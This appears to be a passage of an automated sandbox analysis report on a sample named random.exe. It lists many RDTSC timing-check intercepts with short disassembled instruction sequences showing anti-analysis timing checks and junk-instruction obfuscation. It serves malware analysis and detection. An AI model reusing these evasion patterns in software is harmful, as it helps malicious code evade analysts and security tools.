      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1096359 second address: 109635D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109660B second address: 109660F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109660F second address: 109661A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FA8D8E1DCF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109661A second address: 1096670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007FA8D8E164A8h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 lea eax, dword ptr [ebp+12482FD5h] 0x00000028 call 00007FA8D8E164B9h 0x0000002d js 00007FA8D8E164ACh 0x00000033 sub edx, dword ptr [ebp+122D2906h] 0x00000039 pop edx 0x0000003a nop 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e push ebx 0x0000003f pop ebx 0x00000040 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1096670 second address: 1096694 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA8D8E1DCF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FA8D8E1DD03h 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1096694 second address: 1076E84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FA8D8E164ACh 0x0000000c popad 0x0000000d nop 0x0000000e jno 00007FA8D8E164ACh 0x00000014 jo 00007FA8D8E164A6h 0x0000001a call dword ptr [ebp+1244D64Dh] 0x00000020 pushad 0x00000021 push ecx 0x00000022 pushad 0x00000023 popad 0x00000024 pop ecx 0x00000025 pushad 0x00000026 jnl 00007FA8D8E164A6h 0x0000002c push ebx 0x0000002d pop ebx 0x0000002e jmp 00007FA8D8E164B7h 0x00000033 popad 0x00000034 pushad 0x00000035 jng 00007FA8D8E164A6h 0x0000003b pushad 0x0000003c popad 0x0000003d jmp 00007FA8D8E164ACh 0x00000042 popad 0x00000043 push eax 0x00000044 push edx 0x00000045 js 00007FA8D8E164A6h 0x0000004b jmp 00007FA8D8E164AFh 0x00000050 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10CC067 second address: 10CC076 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA8D8E1DCFBh 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10CC076 second address: 10CC089 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA8D8E164A6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10CC488 second address: 10CC499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA8D8E1DCFDh 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10CC499 second address: 10CC49D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10CC925 second address: 10CC943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FA8D8E1DCF6h 0x0000000a popad 0x0000000b pushad 0x0000000c jo 00007FA8D8E1DCF6h 0x00000012 jp 00007FA8D8E1DCF6h 0x00000018 popad 0x00000019 pushad 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10CC943 second address: 10CC949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10D3FCE second address: 10D4004 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DD00h 0x00000007 jmp 00007FA8D8E1DD06h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push edi 0x00000012 pop edi 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10D4004 second address: 10D401B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E164AAh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jg 00007FA8D8E164A6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10D39C2 second address: 10D39E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jc 00007FA8D8E1DCF6h 0x00000010 jmp 00007FA8D8E1DD05h 0x00000015 popad 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10D39E8 second address: 10D39EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10D39EE second address: 10D39F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10D39F2 second address: 10D39F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10D3B77 second address: 10D3B8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA8D8E1DCFFh 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10D3CE8 second address: 10D3CFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E164AFh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10DA9E0 second address: 10DA9EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FA8D8E1DCF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10DAB2A second address: 10DAB30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10DAC70 second address: 10DAC74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10DAC74 second address: 10DAC84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007FA8D8E164A6h 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10DAC84 second address: 10DAC88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10DAE34 second address: 10DAE4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jno 00007FA8D8E164A6h 0x0000000b pop edi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jno 00007FA8D8E164A6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10DAE4C second address: 10DAE70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA8D8E1DD01h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c jns 00007FA8D8E1DCFCh 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E07D8 second address: 10E07F2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA8D8E164A6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 jmp 00007FA8D8E164AAh 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E07F2 second address: 10E07F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E09A3 second address: 10E09D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA8D8E164B6h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA8D8E164AEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E09D0 second address: 10E09D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E09D4 second address: 10E09D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E0CA0 second address: 10E0CA6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E0CA6 second address: 10E0CB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E0CB2 second address: 10E0CD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA8D8E1DD09h 0x00000009 pop ecx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E0F4A second address: 10E0F5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a jp 00007FA8D8E164A6h 0x00000010 pop ecx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E0F5B second address: 10E0F6F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007FA8D8E1DD28h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E0F6F second address: 10E0F73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E0F73 second address: 10E0F7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E0F7D second address: 10E0F81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E196E second address: 10E1973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E43B0 second address: 10E43CA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FA8D8E164B1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E453A second address: 10E453E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E46BD second address: 10E46D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jnp 00007FA8D8E164AEh 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E46D0 second address: 10E46D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E46D5 second address: 10E46E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA8D8E164A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E46E1 second address: 10E4721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA8D8E1DD02h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007FA8D8E1DCFEh 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 js 00007FA8D8E1DCFAh 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 pop eax 0x00000022 jl 00007FA8D8E1DD02h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E4721 second address: 10E4727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10EB33F second address: 10EB35A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DD07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10EB35A second address: 10EB37C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA8D8E164C4h 0x00000008 jmp 00007FA8D8E164B8h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10EB37C second address: 10EB387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10EB387 second address: 10EB3A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA8D8E164B9h 0x00000009 popad 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10EB3A5 second address: 10EB3AA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10EB642 second address: 10EB669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FA8D8E164B8h 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FA8D8E164A8h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10EB8F3 second address: 10EB8F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10EC97F second address: 10EC983 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10EC983 second address: 10EC98F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop esi 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10ECCA4 second address: 10ECCA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10ECCA8 second address: 10ECCAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10F0F56 second address: 10F0F73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FA8D8E164B7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10F002F second address: 10F0033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10F0033 second address: 10F003B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10F003B second address: 10F0045 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA8D8E1DCFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10F0045 second address: 10F004D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10F01AC second address: 10F01ED instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA8D8E1DCF6h 0x00000008 jg 00007FA8D8E1DCF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jl 00007FA8D8E1DCF6h 0x0000001b jmp 00007FA8D8E1DD03h 0x00000020 push esi 0x00000021 pop esi 0x00000022 popad 0x00000023 jns 00007FA8D8E1DCF8h 0x00000029 push eax 0x0000002a push edx 0x0000002b jne 00007FA8D8E1DCF6h 0x00000031 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10F04C8 second address: 10F04CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10F04CC second address: 10F04E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DD04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10F062C second address: 10F0660 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c jmp 00007FA8D8E164B4h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FA8D8E164AEh 0x00000019 push ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10F0660 second address: 10F0665 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10F0966 second address: 10F096A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10F096A second address: 10F0970 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10F0970 second address: 10F097F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FA8D8E164B0h 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10F0C59 second address: 10F0C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10F0C5F second address: 10F0C63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10F0C63 second address: 10F0C6D instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA8D8E1DCFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10F5881 second address: 10F5885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10F5885 second address: 10F588B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10FC930 second address: 10FC93C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FA8D8E164A6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10FCAA6 second address: 10FCAAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10FCAAA second address: 10FCABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jnc 00007FA8D8E164A6h 0x0000000d jns 00007FA8D8E164A6h 0x00000013 pop ebx 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10FCC3A second address: 10FCC40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10FCDAE second address: 10FCDCE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E164B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10FCF32 second address: 10FCF4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jbe 00007FA8D8E1DD07h 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FA8D8E1DCFFh 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10FCF4E second address: 10FCF80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E164ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c js 00007FA8D8E164A6h 0x00000012 pop ebx 0x00000013 push edx 0x00000014 jmp 00007FA8D8E164B5h 0x00000019 push esi 0x0000001a pop esi 0x0000001b pop edx 0x0000001c rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10FE182 second address: 10FE187 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1106063 second address: 1106068 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1105EBC second address: 1105ED9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FA8D8E1DD05h 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1105ED9 second address: 1105EDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1105EDF second address: 1105EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1105EE5 second address: 1105EE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 110AA93 second address: 110AAA8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FA8D8E1DD00h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 110A49B second address: 110A49F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 110A49F second address: 110A4AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DCFAh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 110A791 second address: 110A79E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007FA8D8E164A6h 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 110A79E second address: 110A7A8 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA8D8E1DCF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 110A7A8 second address: 110A7C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA8D8E164B8h 0x00000009 rdtsc
